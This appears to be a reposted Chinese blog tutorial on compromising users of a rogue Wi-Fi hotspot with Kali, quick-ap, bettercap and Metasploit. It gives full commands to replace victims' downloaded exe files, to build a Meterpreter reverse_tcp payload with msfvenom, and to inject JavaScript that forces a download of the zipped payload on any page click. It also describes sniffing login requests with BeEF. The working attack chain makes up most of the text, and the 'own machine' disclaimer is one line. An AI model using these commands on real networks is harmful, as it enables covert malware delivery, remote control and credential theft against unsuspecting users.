文章出處

  環境需求

  1:kali系統 , 2.0版本

  2:quick-ap

  3:bettercap

  4:bettercap-proxy-modules

  5:博客園賬號(把zip文件傳到博客園的文件服務器)

  主要環境搭建

  目的:替換局域網用戶的下載文件,變為我們自己定義的下載文件, 這個文件可以為一個惡意的exe或者apk

  quick-ap通過github即可下載:https://github.com/sqqihao/quick-ap

  需要bettercap的第三方模塊:https://github.com/sqqihao/bettercap-proxy-modules

  在kali系統中插入usb網卡, 默認的網卡為wlan0, 如果網卡名字不一樣的話,后面的腳本中所有的wlan0都要改, 不保證kali的新版本可用, 測試環境的kali版本為2.0 

  搭建熱點 

  進入quick-ap的目錄下, 執行文件,創建熱點:

./apd.sh

  重新打開一個窗口, 進入bettercap-proxy-modules/http目錄下,執行以下命令, 只要用戶有下載exe文件或者其他類型的文件, 都會被替換,替換為我們自定義的exe文件, apk或者, rar文件也可以, 思路很多:

bettercap -I wlan0 -G 10.0.0.1 --no-spoofing --no-discovery -X --proxy-module replace_file.rb --file-extension exe --file-replace /root/Desktop/file.exe 

    其他

  bettercap-proxy-modules還可以配合beef使用, 修改頁面標題, 修改頁面樣式,嗅探登陸注冊的請求信息

View Code

   bettercap還能實現頁面插入css, 插入js, 插入html等功能, 這些東西可以參考bettercap的官網 https://www.bettercap.org/docs/proxying/http.html

InjectJS ( --proxy-module injectjs ) : Used to inject javascript code/files inside HTML pages.
InjectCSS ( --proxy-module injectcss ) : Used to inject CSS code/files inside HTML pages.
InjectHTML ( --proxy-module injecthtml ) : Used to inject HTML code inside HTML pages.

  開始搞事情,入侵你的電腦

  msf創建payload文件

msfvenom -p  windows/meterpreter/reverse_tcp LHOST=10.0.0.0.1 LPORT=1111 -f exe > exe.exe

  把生成的exe壓縮, 或者用exebind綁定到其它的exe文件上, 再壓縮成zip文件, 傳到博客園的文件服務器

  打開msf控制臺:

use exploit/multi/handler
set lhost 10.0.0.1
set lport 1111set payload windows/meterpreter/reverse_tcp
exploit

  監聽本地端口:

  開始Arp欺騙:bettercap

bettercap -I wlan0 -G 10.0.0.1 --no-spoofing --no-discovery -X --proxy-module=injecthtml --html-data "<script> document.body.onclick=function(){location.href='http://files.cnblogs.com/files/diligenceday/exe.exe.zip'} </script>"

  給所有Http頁面添加html代碼, 只要用戶點擊的body標簽, 就下載一個rar文件, 用戶只要運行這個文件, msf就會返回一個shell

  JS代碼:document.body.onclick=function(){location.href=http://files.cnblogs.com/files/diligenceday/exe.exe.zip'}的意思是當用戶點擊頁面的時候,會自動下載文件

  當用戶執行了文件以后, msf控制臺就有反應了, 6666

  結尾

  相對于使用arp欺騙,用戶瀏覽網頁的時候會非常卡

  但是使用自己創建的熱點, 在網關上面執行arp欺騙, 可以在用戶毫無察覺的情況下, 給用戶添加html代碼, 結合beef, 那是相當好玩啊

  本文的靶機為自己電腦, 無惡意

  相關

  youku視頻:http://v.youku.com/v_show/id_XMjgwMjc2ODI0OA==.html?spm=a2h3j.8428770.3416059.1

  bettercap:https://www.bettercap.org/

  youtube視頻:https://www.youtube.com/watch?v=y9OYrK4j4_4
  quick-ap通過github即可下載:https://github.com/sqqihao/quick-ap

  需要bettercap的第三方模塊:https://github.com/sqqihao/bettercap-proxy-modules

作者: NONO
出處:http://www.cnblogs.com/diligenceday/
企業網站:http://www.idrwl.com/
開源博客:http://www.github.com/sqqihao
QQ:287101329
微信:18101055830 


文章列表


不含病毒。www.avast.com
arrow
arrow
    全站熱搜
    創作者介紹
    創作者 大師兄 的頭像
    大師兄

    IT工程師數位筆記本

    大師兄 發表在 痞客邦 留言(0) 人氣()